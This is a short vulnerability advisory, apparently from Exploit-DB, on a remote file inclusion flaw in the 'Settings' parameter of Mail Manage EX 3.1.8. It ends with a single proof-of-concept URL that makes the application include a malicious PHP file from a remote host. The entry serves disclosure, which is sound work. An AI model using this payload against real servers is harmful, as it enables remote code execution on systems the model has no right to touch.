Mail Manage EX 3.1.8 MMEX - 'Settings' PHP Remote File Inclusion

EDB-ID:

24168

CVE:

N/A




Platform:

PHP

Date:

2004-06-03


source: https://www.securityfocus.com/bid/10457/info

Mail Manage EX is reportedly prone to a remote file include vulnerability. This vulnerability results from insufficient sanitization of user-supplied data and may allow remote attackers to include arbitrary PHP files located on remote servers.

This issue was discovered in Mail Manage EX 3.1.8. It is possible that previous versions are affected as well. 

http://www.example.com/mail/mmex.php?Settings=http://www.example.com/malicious.php